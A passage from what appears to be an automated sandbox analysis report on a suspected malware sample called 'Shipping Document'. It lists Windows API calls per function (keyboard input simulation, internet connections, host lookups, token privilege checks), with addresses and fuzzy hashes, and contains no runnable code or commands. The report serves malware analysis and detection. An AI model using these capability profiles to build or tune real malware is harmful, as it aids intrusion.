                              • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 01021176
                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 01021192
                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 010211F1
                              • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 01021243
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: KeyboardState$InputMessagePostSend
                              • String ID:
                              • API String ID: 432972143-0
                              • Opcode ID: 22fab8fef5f0e295ad8afca6c4e5293056e9668456d87f9ed63eb8d51e7a137d
                              • Instruction ID: 7b011da4478fe7d153566581b19c9936cbfbd359de9a8da92ad761e2da187a06
                              • Opcode Fuzzy Hash: 22fab8fef5f0e295ad8afca6c4e5293056e9668456d87f9ed63eb8d51e7a137d
                              • Instruction Fuzzy Hash: 68312670A407286EFF318A6D8804BFEBBFAAB49310F14439AF5C4925D5C37986558791
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FF644B
                              • __isleadbyte_l.LIBCMT ref: 00FF6479
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FF64A7
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FF64DD
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: e2d1a65f2962f47ce78d923b4c90d7bc1312d3052951433d5002214cb312a7ca
                              • Instruction ID: c25730ce1d82335b599cbe260d34b45ee38a28258385dcfa58cd8d91da05767e
                              • Opcode Fuzzy Hash: e2d1a65f2962f47ce78d923b4c90d7bc1312d3052951433d5002214cb312a7ca
                              • Instruction Fuzzy Hash: 6331AD31A0024AAFDB21EF65CC85BBA7BB5FF41320F154029EA64D71B1EB35D850EB90
                              APIs
                              • GetForegroundWindow.USER32 ref: 01045189
                                • Part of subcall function 0102387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 01023897
                                • Part of subcall function 0102387D: GetCurrentThreadId.KERNEL32 ref: 0102389E
                                • Part of subcall function 0102387D: AttachThreadInput.USER32(00000000,?,010252A7), ref: 010238A5
                              • GetCaretPos.USER32(?), ref: 0104519A
                              • ClientToScreen.USER32(00000000,?), ref: 010451D5
                              • GetForegroundWindow.USER32 ref: 010451DB
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                              • String ID:
                              • API String ID: 2759813231-0
                              • Opcode ID: ed7c5a08652e758b17cfbf6efc0105cc5c5cdf42e2d0d11401e8e04fca04d3b9
                              • Instruction ID: 388eb24d1dda0960efb08a3536c6704ec2e2032c199ef26a8cb53f794e993a72
                              • Opcode Fuzzy Hash: ed7c5a08652e758b17cfbf6efc0105cc5c5cdf42e2d0d11401e8e04fca04d3b9
                              • Instruction Fuzzy Hash: 50312175900109AFDB10EFA5CD85EEFB7F9EF98300F10406AE455E7241EA799E05CBA0
                              APIs
                                • Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623
                              • GetCursorPos.USER32(?), ref: 0104C7C2
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FFBBFB,?,?,?,?,?), ref: 0104C7D7
                              • GetCursorPos.USER32(?), ref: 0104C824
                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FFBBFB,?,?,?), ref: 0104C85E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                              • String ID:
                              • API String ID: 2864067406-0
                              • Opcode ID: e6e38cce01862684d0e1ac798396437306e505b19b51f8bc48297efb4ec53190
                              • Instruction ID: 52eb2e5787fd595b92950a9bb0db79877fcc0192100a7e32ffa773da0c161f82
                              • Opcode Fuzzy Hash: e6e38cce01862684d0e1ac798396437306e505b19b51f8bc48297efb4ec53190
                              • Instruction Fuzzy Hash: F131E175601018AFEB25CF4CC9D8EEA7BF6FB09320F0440A9FA858B251D7369950DFA0
                              APIs
                                • Part of subcall function 01018652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01018669
                                • Part of subcall function 01018652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01018673
                                • Part of subcall function 01018652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01018682
                                • Part of subcall function 01018652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01018689
                                • Part of subcall function 01018652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0101869F
                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 01018BEB
                              • _memcmp.LIBCMT ref: 01018C0E
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01018C44
                              • HeapFree.KERNEL32(00000000), ref: 01018C4B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                              • String ID:
                              • API String ID: 1592001646-0
                              • Opcode ID: 9868f059cd2ac16d81ebd75eee3a00df33288d257773df7604f192be39ddf26f
                              • Instruction ID: d9fe4dd7ac8745e640e42eb74634aab3547613f7a86533fc30c5f4f3914e4c69
                              • Opcode Fuzzy Hash: 9868f059cd2ac16d81ebd75eee3a00df33288d257773df7604f192be39ddf26f
                              • Instruction Fuzzy Hash: A7216D71E01209ABDB10DF98C944BEEB7F8FF44354F14809AE994A7244D739AA05CB50
                              APIs
                              • __setmode.LIBCMT ref: 00FE0BF2
                                • Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01027B20,?,?,00000000), ref: 00FC5B8C
                                • Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01027B20,?,?,00000000,?,?), ref: 00FC5BB0
                              • _fprintf.LIBCMT ref: 00FE0C29
                              • OutputDebugStringW.KERNEL32(?), ref: 01016331
                                • Part of subcall function 00FE4CDA: _flsall.LIBCMT ref: 00FE4CF3
                              • __setmode.LIBCMT ref: 00FE0C5E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                              • String ID:
                              • API String ID: 521402451-0
                              • Opcode ID: fa292773220f3052e9d73a0a4e398f851a21d0250dee7f15150a9cb962035c14
                              • Instruction ID: 60fcb7a68b789ed8b623ac34c8ad16572f399129426d0b107ed910473caea12a
                              • Opcode Fuzzy Hash: fa292773220f3052e9d73a0a4e398f851a21d0250dee7f15150a9cb962035c14
                              • Instruction Fuzzy Hash: B3113A32A042457BCB04B7BAAC47EBE7B699F41320F24415EF104971C2DE792D816791
                              APIs
                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01031A97
                                • Part of subcall function 01031B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01031B40
                                • Part of subcall function 01031B21: InternetCloseHandle.WININET(00000000), ref: 01031BDD
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Internet$CloseConnectHandleOpen
                              • String ID:
                              • API String ID: 1463438336-0
                              • Opcode ID: 33de4ac9abaaa790e5e809277d00dc19ff3377cf2f4bed717f221cf1c20a98f3
                              • Instruction ID: 70454c2e1f6e08ff9f71416db47bbafacabd9e5612869b75e91d46e00d3ab835
                              • Opcode Fuzzy Hash: 33de4ac9abaaa790e5e809277d00dc19ff3377cf2f4bed717f221cf1c20a98f3
                              • Instruction Fuzzy Hash: E521A475200601BFEB169F648C00FBBBBEDFF8C601F00401AFA91D6550E775D41197A0
                              APIs
                                • Part of subcall function 0101F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0101E1C4,?,?,?,0101EFB7,00000000,000000EF,00000119,?,?), ref: 0101F5BC
                                • Part of subcall function 0101F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0101F5E2
                                • Part of subcall function 0101F5AD: lstrcmpiW.KERNEL32(00000000,?,0101E1C4,?,?,?,0101EFB7,00000000,000000EF,00000119,?,?), ref: 0101F613
                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0101EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0101E1DD
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0101E203
                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0101EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0101E237
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: lstrcmpilstrcpylstrlen
                              • String ID: cdecl
                              • API String ID: 4031866154-3896280584
                              • Opcode ID: a17596904a8a8e4e0ce3036ea4bba76c894c1702e7caa45a8dcdadc5c672175b
                              • Instruction ID: a077e7d043f3473b0d79dadbc821d8a15dfe41fae2aadc9314d3547cb39894b9
                              • Opcode Fuzzy Hash: a17596904a8a8e4e0ce3036ea4bba76c894c1702e7caa45a8dcdadc5c672175b
                              • Instruction Fuzzy Hash: 3511D33A200342EFCB26AF68D844DBE77E8FF45310B40802AED46CB258EB75D850D790
                              APIs
                              • _free.LIBCMT ref: 00FF5351
                                • Part of subcall function 00FE594C: __FF_MSGBANNER.LIBCMT ref: 00FE5963
                                • Part of subcall function 00FE594C: __NMSG_WRITE.LIBCMT ref: 00FE596A
                                • Part of subcall function 00FE594C: RtlAllocateHeap.NTDLL(011C0000,00000000,00000001,00000000,?,?,?,00FE1013,?), ref: 00FE598F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AllocateHeap_free
                              • String ID:
                              • API String ID: 614378929-0
                              • Opcode ID: 938e1635e9c9faaa18cb7c40eb0ecd8da8aa74371de984fe2c4a3add4ff78a99
                              • Instruction ID: 11288a9f0f2a6785d9141f3e5dedafc3be6d8d1ed4ab73f6fb76670d70f2d888
                              • Opcode Fuzzy Hash: 938e1635e9c9faaa18cb7c40eb0ecd8da8aa74371de984fe2c4a3add4ff78a99
                              • Instruction Fuzzy Hash: 8A11E732904A1AAFCB313FB9EC4477D37995F10BF1F144429FB889A1A1DE7A8941B750
                              APIs
                              • _memset.LIBCMT ref: 00FC4560
                                • Part of subcall function 00FC410D: _memset.LIBCMT ref: 00FC418D
                                • Part of subcall function 00FC410D: _wcscpy.LIBCMT ref: 00FC41E1
                                • Part of subcall function 00FC410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FC41F1
                              • KillTimer.USER32(?,00000001,?,?), ref: 00FC45B5
                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FC45C4
                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FFD6CE
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                              • String ID:
                              • API String ID: 1378193009-0
                              • Opcode ID: f9cd1f62cf06ab2d109e3c7c9a1e90c37fd64b62d9e849f9012db05bed7714b2
                              • Instruction ID: 49d2b9c5e4b41842d745df90dbed757199921130c054f50acae55f16ea55c0ce
                              • Opcode Fuzzy Hash: f9cd1f62cf06ab2d109e3c7c9a1e90c37fd64b62d9e849f9012db05bed7714b2
                              • Instruction Fuzzy Hash: 05212571904788AFEB328B248956FF6BBEC9F01318F04009DE3DE96245C7792A84AB41
                              APIs
                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 010240D1
                              • _memset.LIBCMT ref: 010240F2
                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 01024144
                              • CloseHandle.KERNEL32(00000000), ref: 0102414D
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CloseControlCreateDeviceFileHandle_memset
                              • String ID:
                              • API String ID: 1157408455-0
                              • Opcode ID: a0caaa9b8d05030f6772e57598152ba597d63e8252a22674c810613c76ac8adf
                              • Instruction ID: 164a0fec89ab1b781bf9813710f423aba1b5515f3a6b69abf6855a707c4d03f8
                              • Opcode Fuzzy Hash: a0caaa9b8d05030f6772e57598152ba597d63e8252a22674c810613c76ac8adf
                              • Instruction Fuzzy Hash: D111AB75D012387AD7305AA99C8DFABBBBCEF45760F1045D6F908D7180D6744E808BA4
                              APIs
                                • Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01027B20,?,?,00000000), ref: 00FC5B8C
                                • Part of subcall function 00FC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01027B20,?,?,00000000,?,?), ref: 00FC5BB0
                              • gethostbyname.WSOCK32(?), ref: 010366AC
                              • WSAGetLastError.WSOCK32(00000000), ref: 010366B7
                              • _memmove.LIBCMT ref: 010366E4
                              • inet_ntoa.WSOCK32(?), ref: 010366EF
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                              • String ID:
                              • API String ID: 1504782959-0
                              • Opcode ID: 443526cf5721a66ad90c8c569a1f4580e1a3e261ec68cc8dbb301385c741eb1f
                              • Instruction ID: 1b770fec8a4cc0543ecc33aca47efaea4f534c30a683a22577b8195c12fa5221
                              • Opcode Fuzzy Hash: 443526cf5721a66ad90c8c569a1f4580e1a3e261ec68cc8dbb301385c741eb1f
                              • Instruction Fuzzy Hash: 2D11907650010AAFCB00EBA5DE86DEEB7B8AF44710B044069F502A7161DF79AF04DB61
                              APIs
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 01019043
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01019055
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0101906B
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01019086
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 4a4bdc6a944f99576a471ddac9556cc2b6a7db6d8117d4f2d3feb1c2c76f9937
                              • Instruction ID: 1149ce3657dc50bf536deb09d092cd5f8081c2f79720f2de91d6d8287237e655
                              • Opcode Fuzzy Hash: 4a4bdc6a944f99576a471ddac9556cc2b6a7db6d8117d4f2d3feb1c2c76f9937
                              • Instruction Fuzzy Hash: 36115A79901219FFEB11DFA9C984EADBBB8FB48350F204095FA44B7294D6726E10DB90
                              APIs
                                • Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623
                              • DefDlgProcW.USER32(?,00000020,?), ref: 00FC12D8
                              • GetClientRect.USER32(?,?), ref: 00FFB84B
                              • GetCursorPos.USER32(?), ref: 00FFB855
                              • ScreenToClient.USER32(?,?), ref: 00FFB860
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Client$CursorLongProcRectScreenWindow
                              • String ID:
                              • API String ID: 4127811313-0
                              • Opcode ID: a03937b596406e8711b760f167f3da64c8c13cbff6b2563b8aef45b3ec094925
                              • Instruction ID: 41749e912415047e02fe89875a48f2afddcc1c74df54e00a469d040f32282bab
                              • Opcode Fuzzy Hash: a03937b596406e8711b760f167f3da64c8c13cbff6b2563b8aef45b3ec094925
                              • Instruction Fuzzy Hash: 72112B7990001AEBDB10EFA8DA86EEE77B8FB06301F000459E951E7141C735BA61ABA5
                              APIs
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010201FD,?,01021250,?,00008000), ref: 0102166F
                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,010201FD,?,01021250,?,00008000), ref: 01021694
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010201FD,?,01021250,?,00008000), ref: 0102169E
                              • Sleep.KERNEL32(?,?,?,?,?,?,?,010201FD,?,01021250,?,00008000), ref: 010216D1
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CounterPerformanceQuerySleep
                              • String ID:
                              • API String ID: 2875609808-0
                              • Opcode ID: 16f6e6f700a6475e6212cf7a7852d82660385fcc52f066216be97e8e57135f93
                              • Instruction ID: 3e966406413472210e6c2029d07f8dcb3f461abdf2cf824afa296b508c014f1e
                              • Opcode Fuzzy Hash: 16f6e6f700a6475e6212cf7a7852d82660385fcc52f066216be97e8e57135f93
                              • Instruction Fuzzy Hash: 25113C71D0052DE7CF20AFA9E988AEEBF78FF0D751F054095E980B6244CB355560CB96
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                              • String ID:
                              • API String ID: 3016257755-0
                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                              • Instruction ID: 6cd2e390a946091f402a1197efef3675b6d33d83954d3cdd7525b065202c31b5
                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                              • Instruction Fuzzy Hash: AD014C3644824EBBCF126E84DC018EEBF62BF69351B588615FB1858031D237C9B1BF81
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 0104B59E
                              • ScreenToClient.USER32(?,?), ref: 0104B5B6
                              • ScreenToClient.USER32(?,?), ref: 0104B5DA
